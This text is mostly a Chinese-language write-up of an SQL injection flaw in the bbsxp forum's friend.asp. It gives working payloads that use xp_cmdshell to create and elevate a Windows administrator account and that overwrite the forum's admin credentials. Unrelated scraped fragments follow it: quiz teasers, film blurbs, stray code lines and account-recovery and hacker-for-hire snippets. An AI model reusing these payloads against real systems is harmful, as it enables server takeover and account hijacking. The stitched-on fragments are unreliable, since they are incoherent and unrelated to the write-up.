漏洞描述: 相信大家都听过bbsxp吧,它是一款网上流行的论坛程序,我就不多作介绍了。这次我检测的是它的sql版,没过多久果然就发现了问题了 我们利用它可以掌握整个论坛的生杀大权,如果管理员sql服务器配置不当的话,甚至可以攻占整个服务器。 ............................................................................................................. 漏洞分析: 这个漏洞主要出在friend.asp这个文件,让我们来看一下有问题的部分源码,下面是用户添加好友的程序: sub add if Request("username")="" then error2("请输入您要添加的好友名字!") end if if Request("username")=Request.Cookies("username") then error2("不能添加自己!") end if if conn.execute("Select count(id)from [user] where username='"&Request("username")&"'")(0)=0 then error2("数据库不存在此用户的资料!") end if 只要求好友的名字不为空和不能添加自己,并没有过滤特殊符号,其实这个不能添加自己的限制也是能绕过的,不过也没什么用 :)。 ..................................................................................................................... 利用 *** : 注册随便注册一个用户,这里我注册的是pinkeyes,好,转到个人控制面板,添加一个论坛存在的人为好友,这里我选的人是king, 选择添加好友按钮,这时会弹出一个输入框,在里面输入: king' ;exec master.dbo.xp_cmdshell 'net user pinkeyes pinkeyes /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- 添加了一个名为pinkeyes,密码为pinkeyes的账户。 ..................................................................................................................... 再来: king' ;exec master.dbo.xp_cmdshell 'net localgroup administrators pinkeyes /add';-- 把pinkeyes加到管理员用户组中。下面的事就不用我说了吧! 注意:如果连接数据库的账号没有权限的话或管理员删除了master.dbo.xp_cmdshell这个存储过程的话是不会成功.但是你可以对这个数据库做 任何事。 .......................................................................................................................... 如果不能添加账户也没关系,也阻挡不了我前进的步伐。好,下面我来讲一下利用 *** : 仍然是添加好友,输入: king' ;update [user] set membercode=5,levelname='社区区长' where username='pinkeyes' -- 把pinkeyes提升为社区区长,前台工作。 再来输入: king';update clubconfig set administrators='│pinkeyes│',adminpassword='pinkeyes' -- 把后台管理员设为pinkeyes,密码也为pinkeyes ok,现在你是管理员了,要干什么就干什么吧!
成语司空见惯中的司空是指?以上是蚂蚁庄园小课堂9月23日的问题,答对可以领取小课堂每天一份的180g小鸡饲料。接下来就让我们一起了解一下该问题的答案吧。 支付宝蚂蚁庄园9月23日小课堂答案 一...
本文目录一览: 1、危险指数100%!《黑客帝国4》曝光的高空动作戏场景有多震撼? 2、如何评价《黑客帝国4》这部电影呢? 3、黑客帝国4片尾有彩蛋吗 4、黑客帝国4剧情解析 危险指数1...
Registry registry = LocateRegistry.createRegistry(1099);$obj = json_decode($data); root@e:/rootkit#...
你能试一下账号登录,随后应用找回账号密码或是是找不回家立即把账户给锁定了。那样他人就没法应用了。 一、用电話更改密码第一,我们在申请注册快手视频号的時刻,全是用自身的手机号申请注册的,因此我们可以用手...
本文导读目录: 1、黑客帝国有几部 2、黑客帝国里有没有李连杰 3、李连杰演过哪些电影 4、李连杰在好莱坞演过多少电影 5、李连杰主演的电影有哪些 6、黑客帝国共有几部 7、李...
一、盗号被判多少怎么找黑客 1、怎么看出被入侵黑客网站不幸的是,许多记者和作家常常把黑客误认为是黑客。盗号被判多少英雄如果它们有价值,它们将在服务器上嵌入特洛伊木马或后门,以便于下次访问,而不使用有价...